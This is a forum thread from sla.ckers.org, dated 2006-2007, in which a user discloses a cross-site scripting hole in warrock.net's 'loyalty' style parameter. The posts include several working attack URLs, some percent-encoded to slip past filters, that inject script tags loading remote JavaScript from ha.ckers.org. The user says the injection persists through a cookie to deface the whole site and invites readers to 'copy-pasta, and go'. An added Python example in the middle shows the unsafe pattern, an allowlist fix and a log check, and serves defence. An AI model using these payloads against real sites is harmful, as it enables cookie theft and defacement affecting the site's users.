sla.ckers.org: ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
I hate this...
Posted by: Kyran
Date: September 23, 2006 01:58AM

I told them in July or near it. Months ago!
I told them to keep in touch with me.
I told them it could be used not only for cookie stealing but for a myriad of other JavaScript malware.



www.warrock.net has a user-input based style sheet.
Basically, you can pick what "loyalty" you want the page to look like.
It's stored into a cookie, so the rest of the site looks like it.

Put www. in front, copy-pasta, and go.
warrock.net/?loyalty=nui"/><script src=http://ha.ckers.org/weird/stallowned.js></script><style>

I didn't test it too much, but it seems like the <style> is needed to make it stick in the cookies, thus making the entire site truly defaced by XSS.

To fix it, simply go to http://www.warrock.net/?loyalty=niu


I posted it openly on the forums there. With a link to the SecurityDocs paper on XSS.

- Kyran

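The mechanism Kyran describes above is a style selector driven by a query parameter that the server echoes into the page and persists in a cookie, so a quote in the value closes the attribute early and whatever follows is rendered as markup on every page that reads the cookie. The following is an added example, not code from the original post or from warrock.net, showing the unsafe pattern beside a hardened version (allowlist first, attribute escaping as a second layer, and only the validated value written to the cookie), plus a small log check that percent-decodes the parameter and flags values outside the allowlist. The style names `niu`/`nui`, the `/css/` path, the cookie format and the access-log lines are constructed assumptions; the real site's values are not on the page.

```python
import html
from urllib.parse import urlparse, parse_qs

# Hypothetical allowlist of known style names; the real set is not on the page.
ALLOWED_LOYALTIES = frozenset({"niu", "nui"})
DEFAULT_LOYALTY = "niu"


def choose_loyalty(requested):
    """Return the requested style only if it is a known name, otherwise the
    default. The unknown value is never echoed back anywhere."""
    if requested in ALLOWED_LOYALTIES:
        return requested
    return DEFAULT_LOYALTY


def vulnerable_stylesheet_tag(loyalty):
    """The pattern described in the post: raw parameter concatenated into an
    href attribute, so a double quote in the value ends the attribute early."""
    return '<link rel="stylesheet" href="/css/' + loyalty + '.css"/>'


def hardened_stylesheet_tag(loyalty):
    """Allowlist plus attribute escaping. The escape is defence in depth: even
    if a quote-bearing name were ever added to the allowlist it could not
    break out of the attribute."""
    chosen = choose_loyalty(loyalty)
    return '<link rel="stylesheet" href="/css/' + html.escape(chosen, quote=True) + '.css"/>'


def loyalty_cookie_header(loyalty):
    """Persist only the validated name, so the cookie can never carry markup
    into the rest of the site (constructed cookie format)."""
    return "Set-Cookie: loyalty=%s; Path=/; HttpOnly; SameSite=Lax" % choose_loyalty(loyalty)


def loyalty_from_request_line(line):
    """Extract the percent-decoded loyalty value from a constructed access-log
    request line of the form 'METHOD PATH PROTOCOL'; None if absent."""
    parts = line.split()
    if len(parts) < 2:
        return None
    qs = parse_qs(urlparse(parts[1]).query, keep_blank_values=True)
    values = qs.get("loyalty")
    return values[0] if values else None


def flag_unknown_loyalties(log_lines):
    """Detection pass: every request whose decoded loyalty value is not a known
    style name is worth a look, since a legitimate client can only ever send
    one of the allowlisted names."""
    flagged = []
    for line in log_lines:
        value = loyalty_from_request_line(line)
        if value is not None and value not in ALLOWED_LOYALTIES:
            flagged.append((line, value))
    return flagged


# Constructed sample log lines; the second carries a harmless bold-tag marker
# rather than a script, to show the decode-then-allowlist check firing.
SAMPLE_LOG = [
    "GET /?loyalty=niu HTTP/1.1",
    "GET /?loyalty=nui%22%3E%3Cb%3Eprobe%3C%2Fb%3E HTTP/1.1",
    "GET /index.php HTTP/1.1",
]

if __name__ == "__main__":
    marker = 'nui"><b>probe</b>'
    print("vulnerable:", vulnerable_stylesheet_tag(marker))
    print("hardened:  ", hardened_stylesheet_tag(marker))
    print("cookie:    ", loyalty_cookie_header(marker))
    for line, value in flag_unknown_loyalties(SAMPLE_LOG):
        print("flagged:   ", repr(value), "in", line)
```

The allowlist is the real fix here: a style selector has a small, fixed set of legal values, so the server should compare against that set and ignore everything else rather than try to sanitise free text. The escaping and the cookie handling only matter once the allowlist exists.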
Re: I hate this...
Posted by: rsnake
Date: September 23, 2006 07:52PM

Until something bad happens most companies don't jump on XSS I've found. Most of the larger companies jump on it simply because it's bad to have anyone lose trust in your site - and that is caused when the media picks up the stories.

- RSnake
Gotta love it. http://ha.ckers.org

Re: I hate this...
Posted by: Kyran
Date: September 24, 2006 10:06PM

Let's see if the boards handle this URI as well as MSN does.
I've encoded part of the string, but left a few random characters unencoded.
The first and last need to be encoded for things to see it as a safe, real URI, it seems.
First, to use a valid style.

http://www.warrock.net/?loyalty=niu
Now to deface.

http://www.warrock.net/?loyalty=%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%20%2F%3E

Now go to http://www.warrock.net to see the stylesheet/cookie action!

- Kyran

Re: I hate this...
Posted by: Kyran
Date: January 29, 2007 11:16PM

Oh dear.

It's still open.

http://warrock.net/?loyalty=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cnoscript%3E

- Kyran

Re: I hate this...
Posted by: alf
Date: January 30, 2007 02:12PM

rsnake Wrote:
-------------------------------------------------------
> Until something bad happens most companies don't
> jump on XSS I've found. Most of the larger
> companies jump on it simply because it's bad to
> have anyone lose trust in your site - and that is
> caused when the media picks up the stories.


hah lol I don't believe this. Why didn't eBay, YouTube, Amazon + Yahoo just even _REPLY_ to my mails? :X

Do we have to code an XSS worm or what do they want to wake up?




Re: I hate this...
Posted by: rsnake
Date: February 03, 2007 07:09PM

I can't comment on Amazon or Yahoo, but I have a lot of contacts at eBay if you want me to get you in touch with them.

- RSnake
Gotta love it. http://ha.ckers.org

Re: I hate this...
Posted by: Ghozt
Date: February 05, 2007 12:46AM

I have a contact at Yahoo that can get it fixed in < 1 day, just PM me and I'll get you in contact with them. I don't know about Amazon, though.
